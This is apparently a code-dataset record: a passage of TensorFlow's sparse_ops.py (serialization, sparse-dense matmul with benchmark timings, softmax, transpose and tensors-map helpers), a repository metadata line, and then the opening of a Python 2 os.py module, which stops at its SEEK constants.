- If `new_shape` has dimension sizes that are too small.
- If shapes are not known during graph construction time, and during run
time it is found out that the ranks do not match.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
in_indices = array_ops.identity(sp_input.indices)
in_values = array_ops.identity(sp_input.values)
in_shape = array_ops.identity(sp_input.dense_shape)
if new_shape is None:
dim_low_bound = math_ops.reduce_max(in_indices, axis=0)
output_shape_tensor = math_ops.maximum(
array_ops.constant(0, dtype=dtypes.int64),
math_ops.add(dim_low_bound, array_ops.ones_like(in_shape)))
else:
output_shape_tensor = ops.convert_to_tensor(new_shape)
output_shape_tensor.get_shape().assert_has_rank(1)
output_shape_tensor = math_ops.cast(output_shape_tensor, dtypes.int64)
# For cases when shape is known during graph construction, this catches the
# error before the sparse_tensor.SparseTensor catches it.
output_shape_tensor.get_shape()[0].merge_with(in_shape.get_shape()[0])
output_shape_tensor_const = tensor_util.constant_value(output_shape_tensor)
# For cases where all shapes are known during graph construction
if (output_shape_tensor_const is not None and
sp_input.get_shape().is_fully_defined()):
in_shape_const = np.array(sp_input.get_shape().as_list())
if not np.all(in_shape_const <= output_shape_tensor_const):
raise ValueError(
"Requested new_shape should have dimension sizes >= sp_input.shape."
" Found new_shape (%s), sp_input.shape (%s)." %
(in_shape_const, output_shape_tensor_const))
output_shape_tensor = output_shape_tensor_const
else:
# For cases where shape is not known during graph construction.
output_shape_tensor = control_flow_ops.with_dependencies([
check_ops.assert_equal(
array_ops.shape(in_shape), array_ops.shape(output_shape_tensor))
], output_shape_tensor)
output_shape_tensor = control_flow_ops.with_dependencies(
[check_ops.assert_less_equal(in_shape, output_shape_tensor)],
output_shape_tensor)
return sparse_tensor.SparseTensor(in_indices, in_values, output_shape_tensor)
@tf_export("sparse_fill_empty_rows")
def sparse_fill_empty_rows(sp_input, default_value, name=None):
"""Fills empty rows in the input 2-D `SparseTensor` with a default value.
This op adds entries with the specified `default_value` at index
`[row, 0]` for any row in the input that does not already have a value.
For example, suppose `sp_input` has shape `[5, 6]` and non-empty values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
Rows 1 and 4 are empty, so the output will be of shape `[5, 6]` with values:
[0, 1]: a
[0, 3]: b
[1, 0]: default_value
[2, 0]: c
[3, 1]: d
[4, 0]: default_value
Note that the input may have empty columns at the end, with no effect on
this op.
The output `SparseTensor` will be in row-major order and will have the
same shape as the input.
This op also returns an indicator vector such that
empty_row_indicator[i] = True iff row i was an empty row.
Args:
sp_input: A `SparseTensor` with shape `[N, M]`.
default_value: The value to fill for empty rows, with the same type as
`sp_input.`
name: A name prefix for the returned tensors (optional)
Returns:
sp_ordered_output: A `SparseTensor` with shape `[N, M]`, and with all empty
rows filled in with `default_value`.
empty_row_indicator: A bool vector of length `N` indicating whether each
input row was empty.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
with ops.name_scope(name, "SparseFillEmptyRows", [sp_input]):
default_value = ops.convert_to_tensor(
default_value, dtype=sp_input.values.dtype)
(output_indices, output_values, empty_row_indicator,
unused_reverse_index_map) = gen_sparse_ops.sparse_fill_empty_rows(
indices=sp_input.indices,
values=sp_input.values,
dense_shape=sp_input.dense_shape,
default_value=default_value)
return (sparse_tensor.SparseTensor(
indices=output_indices,
values=output_values,
dense_shape=sp_input.dense_shape), empty_row_indicator)
@tf_export("serialize_sparse")
def serialize_sparse(sp_input, name=None, out_type=dtypes.string):
"""Serialize a `SparseTensor` into a 3-vector (1-D `Tensor`) object.
Args:
sp_input: The input `SparseTensor`.
name: A name prefix for the returned tensors (optional).
out_type: The `dtype` to use for serialization.
Returns:
A 3-vector (1-D `Tensor`), with each column representing the serialized
`SparseTensor`'s indices, values, and shape (respectively).
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.serialize_sparse(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
name=name,
out_type=out_type)
@tf_export("serialize_many_sparse")
def serialize_many_sparse(sp_input, name=None, out_type=dtypes.string):
"""Serialize `N`-minibatch `SparseTensor` into an `[N, 3]` `Tensor`.
The `SparseTensor` must have rank `R` greater than 1, and the first dimension
is treated as the minibatch dimension. Elements of the `SparseTensor`
must be sorted in increasing order of this first dimension. The serialized
`SparseTensor` objects going into each row of the output `Tensor` will have
rank `R-1`.
The minibatch size `N` is extracted from `sparse_shape[0]`.
Args:
sp_input: The input rank `R` `SparseTensor`.
name: A name prefix for the returned tensors (optional).
out_type: The `dtype` to use for serialization.
Returns:
A matrix (2-D `Tensor`) with `N` rows and `3` columns. Each column
represents serialized `SparseTensor`'s indices, values, and shape
(respectively).
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.serialize_many_sparse(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
name=name,
out_type=out_type)
def deserialize_sparse(serialized_sparse, dtype, rank=None, name=None):
"""Deserialize `SparseTensor` objects.
The input `serialized_sparse` must have the shape `[?, ?, ..., ?, 3]` where
the last dimension stores serialized `SparseTensor` objects and the other N
dimensions (N >= 0) correspond to a batch. The ranks of the original
`SparseTensor` objects must all match. When the final `SparseTensor` is
created, its rank is the rank of the incoming `SparseTensor` objects plus N;
the sparse tensors have been concatenated along new dimensions, one for each
batch.
The output `SparseTensor` object's shape values for the original dimensions
are the max across the input `SparseTensor` objects' shape values for the
corresponding dimensions. The new dimensions match the size of the batch.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `SparseReorder` to restore index ordering.
For example, if the serialized input is a `[2 x 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
serialized_sparse: The serialized `SparseTensor` objects.
The last dimension must have 3 columns.
dtype: The `dtype` of the serialized `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional).
Returns:
A `SparseTensor` representing the deserialized `SparseTensor` objects.
"""
output_indices, output_values, output_shape = (
gen_sparse_ops.deserialize_sparse(serialized_sparse, dtype, name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
@tf_export("deserialize_many_sparse")
def deserialize_many_sparse(serialized_sparse, dtype, rank=None, name=None):
"""Deserialize and concatenate `SparseTensors` from a serialized minibatch.
The input `serialized_sparse` must be a string matrix of shape `[N x 3]` where
`N` is the minibatch size and the rows correspond to packed outputs of
`serialize_sparse`. The ranks of the original `SparseTensor` objects
must all match. When the final `SparseTensor` is created, it has rank one
higher than the ranks of the incoming `SparseTensor` objects (they have been
concatenated along a new row dimension).
The output `SparseTensor` object's shape values for all dimensions but the
first are the max across the input `SparseTensor` objects' shape values
for the corresponding dimensions. Its first shape value is `N`, the minibatch
size.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `sparse_reorder` to restore index ordering.
For example, if the serialized input is a `[2, 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
serialized_sparse: 2-D `Tensor` of type `string` of shape `[N, 3]`.
The serialized and packed `SparseTensor` objects.
dtype: The `dtype` of the serialized `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` representing the deserialized `SparseTensor`s,
concatenated along the `SparseTensor`s' first dimension.
All of the serialized `SparseTensor`s must have had the same rank and type.
"""
output_indices, output_values, output_shape = (
gen_sparse_ops.deserialize_many_sparse(
serialized_sparse, dtype, name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
@tf_export("sparse_tensor_dense_matmul")
def sparse_tensor_dense_matmul(sp_a,
b,
adjoint_a=False,
adjoint_b=False,
name=None):
# pylint: disable=line-too-long
"""Multiply SparseTensor (of rank 2) "A" by dense matrix "B".
No validity checking is performed on the indices of `A`. However, the
following input format is recommended for optimal behavior:
* If `adjoint_a == false`: `A` should be sorted in lexicographically
increasing order. Use `sparse_reorder` if you're not sure.
* If `adjoint_a == true`: `A` should be sorted in order of increasing
dimension 1 (i.e., "column major" order instead of "row major" order).
Using `tf.nn.embedding_lookup_sparse` for sparse multiplication:
It's not obvious but you can consider `embedding_lookup_sparse` as another
sparse and dense multiplication. In some situations, you may prefer to use
`embedding_lookup_sparse` even though you're not dealing with embeddings.
There are two questions to ask in the decision process: Do you need gradients
computed as sparse too? Is your sparse data represented as two
`SparseTensor`s: ids and values? There is more explanation about data format
below. If you answer any of these questions as yes, consider using
`tf.nn.embedding_lookup_sparse`.
Following explains differences between the expected SparseTensors:
For example if dense form of your sparse data has shape `[3, 5]` and values:
[[ a ]
[b c]
[ d ]]
`SparseTensor` format expected by `sparse_tensor_dense_matmul`:
`sp_a` (indices, values):
[0, 1]: a
[1, 0]: b
[1, 4]: c
[2, 2]: d
`SparseTensor` format expected by `embedding_lookup_sparse`:
`sp_ids` `sp_weights`
[0, 0]: 1 [0, 0]: a
[1, 0]: 0 [1, 0]: b
[1, 1]: 4 [1, 1]: c
[2, 0]: 2 [2, 0]: d
Deciding when to use `sparse_tensor_dense_matmul` vs.
`matmul`(a_is_sparse=True):
There are a number of questions to ask in the decision process, including:
* Will the SparseTensor `A` fit in memory if densified?
* Is the column count of the product large (>> 1)?
* Is the density of `A` larger than approximately 15%?
If the answer to several of these questions is yes, consider
converting the `SparseTensor` to a dense one and using `tf.matmul` with
`a_is_sparse=True`.
This operation tends to perform well when `A` is more sparse, if the column
size of the product is small (e.g. matrix-vector multiplication), if
`sp_a.dense_shape` takes on large values.
Below is a rough speed comparison between `sparse_tensor_dense_matmul`,
labeled 'sparse', and `matmul`(a_is_sparse=True), labeled 'dense'. For
purposes of the comparison, the time spent converting from a `SparseTensor` to
a dense `Tensor` is not included, so it is overly conservative with respect to
the time ratio.
Benchmark system:
CPU: Intel Ivybridge with HyperThreading (6 cores) dL1:32KB dL2:256KB dL3:12MB
GPU: NVidia Tesla k40c
Compiled with:
`-c opt --config=cuda --copt=-mavx`
```
tensorflow/python/sparse_tensor_dense_matmul_op_test --benchmarks
A sparse [m, k] with % nonzero values between 1% and 80%
B dense [k, n]
% nnz n gpu m k dt(dense) dt(sparse) dt(sparse)/dt(dense)
0.01 1 True 100 100 0.000221166 0.00010154 0.459112
0.01 1 True 100 1000 0.00033858 0.000109275 0.322745
0.01 1 True 1000 100 0.000310557 9.85661e-05 0.317385
0.01 1 True 1000 1000 0.0008721 0.000100875 0.115669
0.01 1 False 100 100 0.000208085 0.000107603 0.51711
0.01 1 False 100 1000 0.000327112 9.51118e-05 0.290762
0.01 1 False 1000 100 0.000308222 0.00010345 0.335635
0.01 1 False 1000 1000 0.000865721 0.000101397 0.117124
0.01 10 True 100 100 0.000218522 0.000105537 0.482958
0.01 10 True 100 1000 0.000340882 0.000111641 0.327506
0.01 10 True 1000 100 0.000315472 0.000117376 0.372064
0.01 10 True 1000 1000 0.000905493 0.000123263 0.136128
0.01 10 False 100 100 0.000221529 9.82571e-05 0.44354
0.01 10 False 100 1000 0.000330552 0.000112615 0.340687
0.01 10 False 1000 100 0.000341277 0.000114097 0.334324
0.01 10 False 1000 1000 0.000819944 0.000120982 0.147549
0.01 25 True 100 100 0.000207806 0.000105977 0.509981
0.01 25 True 100 1000 0.000322879 0.00012921 0.400181
0.01 25 True 1000 100 0.00038262 0.00014158 0.370035
0.01 25 True 1000 1000 0.000865438 0.000202083 0.233504
0.01 25 False 100 100 0.000209401 0.000104696 0.499979
0.01 25 False 100 1000 0.000321161 0.000130737 0.407076
0.01 25 False 1000 100 0.000377012 0.000136801 0.362856
0.01 25 False 1000 1000 0.000861125 0.00020272 0.235413
0.2 1 True 100 100 0.000206952 9.69219e-05 0.46833
0.2 1 True 100 1000 0.000348674 0.000147475 0.422959
0.2 1 True 1000 100 0.000336908 0.00010122 0.300439
0.2 1 True 1000 1000 0.001022 0.000203274 0.198898
0.2 1 False 100 100 0.000207532 9.5412e-05 0.459746
0.2 1 False 100 1000 0.000356127 0.000146824 0.41228
0.2 1 False 1000 100 0.000322664 0.000100918 0.312764
0.2 1 False 1000 1000 0.000998987 0.000203442 0.203648
0.2 10 True 100 100 0.000211692 0.000109903 0.519165
0.2 10 True 100 1000 0.000372819 0.000164321 0.440753
0.2 10 True 1000 100 0.000338651 0.000144806 0.427596
0.2 10 True 1000 1000 0.00108312 0.000758876 0.70064
0.2 10 False 100 100 0.000215727 0.000110502 0.512231
0.2 10 False 100 1000 0.000375419 0.0001613 0.429653
0.2 10 False 1000 100 0.000336999 0.000145628 0.432132
0.2 10 False 1000 1000 0.00110502 0.000762043 0.689618
0.2 25 True 100 100 0.000218705 0.000129913 0.594009
0.2 25 True 100 1000 0.000394794 0.00029428 0.745402
0.2 25 True 1000 100 0.000404483 0.0002693 0.665788
0.2 25 True 1000 1000 0.0012002 0.00194494 1.62052
0.2 25 False 100 100 0.000221494 0.0001306 0.589632
0.2 25 False 100 1000 0.000396436 0.000297204 0.74969
0.2 25 False 1000 100 0.000409346 0.000270068 0.659754
0.2 25 False 1000 1000 0.00121051 0.00193737 1.60046
0.5 1 True 100 100 0.000214981 9.82111e-05 0.456836
0.5 1 True 100 1000 0.000415328 0.000223073 0.537101
0.5 1 True 1000 100 0.000358324 0.00011269 0.314492
0.5 1 True 1000 1000 0.00137612 0.000437401 0.317851
0.5 1 False 100 100 0.000224196 0.000101423 0.452386
0.5 1 False 100 1000 0.000400987 0.000223286 0.556841
0.5 1 False 1000 100 0.000368825 0.00011224 0.304318
0.5 1 False 1000 1000 0.00136036 0.000429369 0.31563
0.5 10 True 100 100 0.000222125 0.000112308 0.505608
0.5 10 True 100 1000 0.000461088 0.00032357 0.701753
0.5 10 True 1000 100 0.000394624 0.000225497 0.571422
0.5 10 True 1000 1000 0.00158027 0.00190898 1.20801
0.5 10 False 100 100 0.000232083 0.000114978 0.495418
0.5 10 False 100 1000 0.000454574 0.000324632 0.714146
0.5 10 False 1000 100 0.000379097 0.000227768 0.600817
0.5 10 False 1000 1000 0.00160292 0.00190168 1.18638
0.5 25 True 100 100 0.00023429 0.000151703 0.647501
0.5 25 True 100 1000 0.000497462 0.000598873 1.20386
0.5 25 True 1000 100 0.000460778 0.000557038 1.20891
0.5 25 True 1000 1000 0.00170036 0.00467336 2.74845
0.5 25 False 100 100 0.000228981 0.000155334 0.678371
0.5 25 False 100 1000 0.000496139 0.000620789 1.25124
0.5 25 False 1000 100 0.00045473 0.000551528 1.21287
0.5 25 False 1000 1000 0.00171793 0.00467152 2.71927
0.8 1 True 100 100 0.000222037 0.000105301 0.47425
0.8 1 True 100 1000 0.000410804 0.000329327 0.801664
0.8 1 True 1000 100 0.000349735 0.000131225 0.375212
0.8 1 True 1000 1000 0.00139219 0.000677065 0.48633
0.8 1 False 100 100 0.000214079 0.000107486 0.502085
0.8 1 False 100 1000 0.000413746 0.000323244 0.781261
0.8 1 False 1000 100 0.000348983 0.000131983 0.378193
0.8 1 False 1000 1000 0.00136296 0.000685325 0.50282
0.8 10 True 100 100 0.000229159 0.00011825 0.516017
0.8 10 True 100 1000 0.000498845 0.000532618 1.0677
0.8 10 True 1000 100 0.000383126 0.00029935 0.781336
0.8 10 True 1000 1000 0.00162866 0.00307312 1.88689
0.8 10 False 100 100 0.000230783 0.000124958 0.541452
0.8 10 False 100 1000 0.000493393 0.000550654 1.11606
0.8 10 False 1000 100 0.000377167 0.000298581 0.791642
0.8 10 False 1000 1000 0.00165795 0.00305103 1.84024
0.8 25 True 100 100 0.000233496 0.000175241 0.75051
0.8 25 True 100 1000 0.00055654 0.00102658 1.84458
0.8 25 True 1000 100 0.000463814 0.000783267 1.68875
0.8 25 True 1000 1000 0.00186905 0.00755344 4.04132
0.8 25 False 100 100 0.000240243 0.000175047 0.728625
0.8 25 False 100 1000 0.000578102 0.00104499 1.80763
0.8 25 False 1000 100 0.000485113 0.000776849 1.60138
0.8 25 False 1000 1000 0.00211448 0.00752736 3.55992
```
Args:
sp_a: SparseTensor A, of rank 2.
b: A dense Matrix with the same dtype as sp_a.
adjoint_a: Use the adjoint of A in the matrix multiply. If A is complex,
this is transpose(conj(A)). Otherwise it's transpose(A).
adjoint_b: Use the adjoint of B in the matrix multiply. If B is complex,
this is transpose(conj(B)). Otherwise it's transpose(B).
name: A name prefix for the returned tensors (optional)
Returns:
A dense matrix (pseudo-code in dense np.matrix notation):
`A = A.H if adjoint_a else A`
`B = B.H if adjoint_b else B`
`return A*B`
"""
# pylint: enable=line-too-long
sp_a = _convert_to_sparse_tensor(sp_a)
with ops.name_scope(name, "SparseTensorDenseMatMul",
[sp_a.indices, sp_a.values, b]) as name:
b = ops.convert_to_tensor(b, name="b")
return gen_sparse_ops.sparse_tensor_dense_mat_mul(
a_indices=sp_a.indices,
a_values=sp_a.values,
a_shape=sp_a.dense_shape,
b=b,
adjoint_a=adjoint_a,
adjoint_b=adjoint_b)
@tf_export("sparse_softmax")
def sparse_softmax(sp_input, name=None):
"""Applies softmax to a batched N-D `SparseTensor`.
The inputs represent an N-D SparseTensor with logical shape `[..., B, C]`
(where `N >= 2`), and with indices sorted in the canonical lexicographic
order.
This op is equivalent to applying the normal `tf.nn.softmax()` to each
innermost logical submatrix with shape `[B, C]`, but with the catch that *the
implicitly zero elements do not participate*. Specifically, the algorithm is
equivalent to:
(1) Applies `tf.nn.softmax()` to a densified view of each innermost
submatrix with shape `[B, C]`, along the size-C dimension;
(2) Masks out the original implicitly-zero locations;
(3) Renormalizes the remaining elements.
Hence, the `SparseTensor` result has exactly the same non-zero indices and
shape.
Example:
```python
# First batch:
# [? e.]
# [1. ? ]
# Second batch:
# [e ? ]
# [e e ]
shape = [2, 2, 2] # 3-D SparseTensor
values = np.asarray([[[0., np.e], [1., 0.]], [[np.e, 0.], [np.e, np.e]]])
indices = np.vstack(np.where(values)).astype(np.int64).T
result = tf.sparse_softmax(tf.SparseTensor(indices, values, shape))
# ...returning a 3-D SparseTensor, equivalent to:
# [? 1.] [1 ?]
# [1. ? ] and [.5 .5]
# where ? means implicitly zero.
```
Args:
sp_input: N-D `SparseTensor`, where `N >= 2`.
name: optional name of the operation.
Returns:
output: N-D `SparseTensor` representing the results.
"""
with ops.name_scope(name, "SparseSoftmax",
[sp_input.indices, sp_input.values]) as name:
out_vals = gen_sparse_ops.sparse_softmax(sp_input.indices, sp_input.values,
sp_input.dense_shape)
return sparse_tensor.SparseTensor(sp_input.indices, out_vals,
sp_input.dense_shape)
@tf_export("sparse_maximum")
def sparse_maximum(sp_a, sp_b, name=None):
"""Returns the element-wise max of two SparseTensors.
Assumes the two SparseTensors have the same shape, i.e., no broadcasting.
Example:
```python
sp_zero = sparse_tensor.SparseTensor([[0]], [0], [7])
sp_one = sparse_tensor.SparseTensor([[1]], [1], [7])
res = tf.sparse_maximum(sp_zero, sp_one).eval()
# "res" should be equal to SparseTensor([[0], [1]], [0, 1], [7]).
```
Args:
sp_a: a `SparseTensor` operand whose dtype is real, and indices
lexicographically ordered.
sp_b: the other `SparseTensor` operand with the same requirements (and the
same shape).
name: optional name of the operation.
Returns:
output: the output SparseTensor.
"""
with ops.name_scope(
name, "SparseSparseMaximum",
[sp_a.indices, sp_a.values, sp_b.indices, sp_b.values]) as name:
out_indices, out_values = gen_sparse_ops.sparse_sparse_maximum(
sp_a.indices,
sp_a.values,
sp_a.dense_shape,
sp_b.indices,
sp_b.values,
sp_b.dense_shape,
name=name)
return sparse_tensor.SparseTensor(out_indices, out_values, sp_a.dense_shape)
@tf_export("sparse_minimum")
def sparse_minimum(sp_a, sp_b, name=None):
"""Returns the element-wise min of two SparseTensors.
Assumes the two SparseTensors have the same shape, i.e., no broadcasting.
Example:
```python
sp_zero = sparse_tensor.SparseTensor([[0]], [0], [7])
sp_one = sparse_tensor.SparseTensor([[1]], [1], [7])
res = tf.sparse_minimum(sp_zero, sp_one).eval()
# "res" should be equal to SparseTensor([[0], [1]], [0, 0], [7]).
```
Args:
sp_a: a `SparseTensor` operand whose dtype is real, and indices
lexicographically ordered.
sp_b: the other `SparseTensor` operand with the same requirements (and the
same shape).
name: optional name of the operation.
Returns:
output: the output SparseTensor.
"""
with ops.name_scope(
name, "SparseSparseMinimum",
[sp_a.indices, sp_a.values, sp_b.indices, sp_b.values]) as name:
out_indices, out_values = gen_sparse_ops.sparse_sparse_minimum(
sp_a.indices,
sp_a.values,
sp_a.dense_shape,
sp_b.indices,
sp_b.values,
sp_b.dense_shape,
name=name)
return sparse_tensor.SparseTensor(out_indices, out_values, sp_a.dense_shape)
@tf_export("sparse_transpose")
def sparse_transpose(sp_input, perm=None, name=None):
"""Transposes a `SparseTensor`
The returned tensor's dimension i will correspond to the input dimension
`perm[i]`. If `perm` is not given, it is set to (n-1...0), where n is
the rank of the input tensor. Hence by default, this operation performs a
regular matrix transpose on 2-D input Tensors.
For example, if `sp_input` has shape `[4, 5]` and `indices` / `values`:
[0, 3]: b
[0, 1]: a
[3, 1]: d
[2, 0]: c
then the output will be a `SparseTensor` of shape `[5, 4]` and
`indices` / `values`:
[0, 2]: c
[1, 0]: a
[1, 3]: d
[3, 0]: b
Args:
sp_input: The input `SparseTensor`.
perm: A permutation of the dimensions of `sp_input`.
name: A name prefix for the returned tensors (optional)
Returns:
A transposed `SparseTensor`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
with ops.name_scope(name, "SparseTranspose", [sp_input]) as name:
if perm is None:
rank = array_ops.rank(sp_input)
perm = (rank - 1) - math_ops.range(0, rank, 1)
indices = sp_input.indices
transposed_indices = array_ops.transpose(
array_ops.gather(array_ops.transpose(indices), perm))
perm_ = tensor_util.constant_value(ops.convert_to_tensor(perm))
if perm_ is not None and sp_input.get_shape().is_fully_defined():
old_shape_ = sp_input.get_shape().as_list()
transposed_dense_shape = list(old_shape_) # Copy.
for i, p in enumerate(perm_):
transposed_dense_shape[i] = old_shape_[p]
else:
dense_shape = sp_input.dense_shape
transposed_dense_shape = array_ops.gather(dense_shape, perm)
transposed_st = sparse_tensor.SparseTensor(
transposed_indices, sp_input.values, transposed_dense_shape)
transposed_st = sparse_reorder(transposed_st)
return transposed_st
def _add_sparse_to_tensors_map(sp_input,
container=None,
shared_name=None,
name=None):
"""Add a `SparseTensor` to a `SparseTensorsMap` and return its handle.
Args:
sp_input: The input `SparseTensor`.
container: The container for the underlying `SparseTensorsMap` (optional).
shared_name: The shared name for the underlying `SparseTensorsMap`
(optional, defaults to the name of the newly created op).
name: A name prefix for the returned tensors (optional).
Returns:
A string 1-vector (1D `Tensor`), with the single element representing the
a unique handle to a `SparseTensor` stored by the `SparseTensorMap`
underlying this op.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.add_sparse_to_tensors_map(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
container=container,
shared_name=shared_name,
name=name)
def _add_many_sparse_to_tensors_map(sp_input,
container=None,
shared_name=None,
name=None):
"""Add a minibatch `SparseTensor` to a `SparseTensorsMap`, return `N` handles.
The `SparseTensor` must have rank `R` greater than 1, and the first dimension
is treated as the minibatch dimension. Elements of the `SparseTensor`
must be sorted in increasing order of this first dimension. The serialized
`SparseTensor` objects going into each row of the output `Tensor` will have
rank `R-1`.
The minibatch size `N` is extracted from `sparse_shape[0]`.
Args:
sp_input: The input rank `R` `SparseTensor`.
container: The container for the underlying `SparseTensorsMap` (optional).
shared_name: The shared name for the underlying `SparseTensorsMap`
(optional, defaults to the name of the newly created op).
name: A name prefix for the returned tensors (optional).
Returns:
A string matrix (2-D `Tensor`) with `N` rows and `1` column.
Each row represents a unique handle to a `SparseTensor` stored by
the `SparseTensorMap` underlying this op.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.add_many_sparse_to_tensors_map(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
container=container,
shared_name=shared_name,
name=name)
def _take_many_sparse_from_tensors_map(sparse_map_op,
sparse_handles,
rank=None,
name=None):
"""Read `SparseTensors` from a `SparseTensorsMap` and concatenate them.
The input `sparse_handles` must be a string matrix of shape `[N, 1]` where
`N` is the minibatch size and the rows correspond to packed outputs of
`add_sparse_to_tensors_map`. The ranks of the original `SparseTensor` objects
must all match. When the final `SparseTensor` is created, it has rank one
higher than the ranks of the incoming `SparseTensor` objects (they have been
concatenated along a new row dimension).
The output `SparseTensor` object's shape values for all dimensions but the
first are the max across the input `SparseTensor` objects' shape values
for the corresponding dimensions. Its first shape value is `N`, the minibatch
size.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `sparse_reorder` to restore index ordering.
For example, if the serialized input is a `[2, 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
sparse_map_op: The `Operation` that created the original handles.
Usually this is, e.g., `add_sparse_to_tensors_map(...).op`.
sparse_handles: 2-D `Tensor` of type `string` of shape `[N, 1]`.
The serialized and packed `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` representing the deserialized `SparseTensor`s,
concatenated along the `SparseTensor`s' first dimension.
All of the serialized `SparseTensor`s must have had the same rank and type.
"""
if not isinstance(sparse_map_op, ops.Operation):
raise TypeError("sparse_map_op be an Operation")
if sparse_map_op.type not in ("AddSparseToTensorsMap",
"AddManySparseToTensorsMap"):
raise TypeError(
"sparse_map_op must be one of AddSparseToTensorsMap or "
"AddSparseToTensorsMap. Instead, found `%s`." % sparse_map_op.type)
with ops.colocate_with(sparse_map_op):
shared_name = sparse_map_op.get_attr("shared_name") or sparse_map_op.name
output_indices, output_values, output_shape = (
gen_sparse_ops.take_many_sparse_from_tensors_map(
sparse_handles,
dtype=sparse_map_op.get_attr("T"),
container=sparse_map_op.get_attr("container"),
shared_name=shared_name,
name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
|
eaplatanios/tensorflow
|
tensorflow/python/ops/sparse_ops.py
|
Python
|
apache-2.0
| 82,052
| 0.002803
|
r"""OS routines for Mac, NT, or Posix depending on what system we're on.
This exports:
- all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.
- os.path is one of the modules posixpath, or ntpath
- os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'
- os.curdir is a string representing the current directory ('.' or ':')
- os.pardir is a string representing the parent directory ('..' or '::')
- os.sep is the (or a most common) pathname separator ('/' or ':' or '\\')
- os.extsep is the extension separator ('.' or '/')
- os.altsep is the alternate pathname separator (None or '/')
- os.pathsep is the component separator used in $PATH etc
- os.linesep is the line separator in text files ('\r' or '\n' or '\r\n')
- os.defpath is the default search path for executables
- os.devnull is the file path of the null device ('/dev/null', etc.)
Programs that import and use 'os' stand a better chance of being
portable between different platforms. Of course, they must then
only use functions that are defined by all platforms (e.g., unlink
and opendir), and leave all pathname manipulation to os.path
(e.g., split and join).
"""
#'
import sys, errno
_names = sys.builtin_module_names
# Note: more names are added to __all__ later.
__all__ = ["altsep", "curdir", "pardir", "sep", "extsep", "pathsep", "linesep",
"defpath", "name", "path", "devnull",
"SEEK_SET", "SEEK_CUR", "SEEK_END"]
def _get_exports_list(module):
try:
return list(module.__all__)
except AttributeError:
return [n for n in dir(module) if n[0] != '_']
if 'posix' in _names:
name = 'posix'
linesep = '\n'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath as path
import posix
__all__.extend(_get_exports_list(posix))
del posix
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
from nt import *
try:
from nt import _exit
except ImportError:
pass
import ntpath as path
import nt
__all__.extend(_get_exports_list(nt))
del nt
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
if sys.version.find('EMX GCC') == -1:
import ntpath as path
else:
import os2emxpath as path
from _emx_link import link
import os2
__all__.extend(_get_exports_list(os2))
del os2
elif 'ce' in _names:
name = 'ce'
linesep = '\r\n'
from ce import *
try:
from ce import _exit
except ImportError:
pass
# We can use the standard Windows path.
import ntpath as path
import ce
__all__.extend(_get_exports_list(ce))
del ce
elif 'riscos' in _names:
name = 'riscos'
linesep = '\n'
from riscos import *
try:
from riscos import _exit
except ImportError:
pass
import riscospath as path
import riscos
__all__.extend(_get_exports_list(riscos))
del riscos
else:
raise ImportError, 'no os specific module found'
sys.modules['os.path'] = path
from os.path import (curdir, pardir, sep, pathsep, defpath, extsep, altsep,
devnull)
del _names
# Python uses fixed values for the SEEK_ constants; they are mapped
# to native constants if necessary in posixmodule.c
SEEK_SET = 0
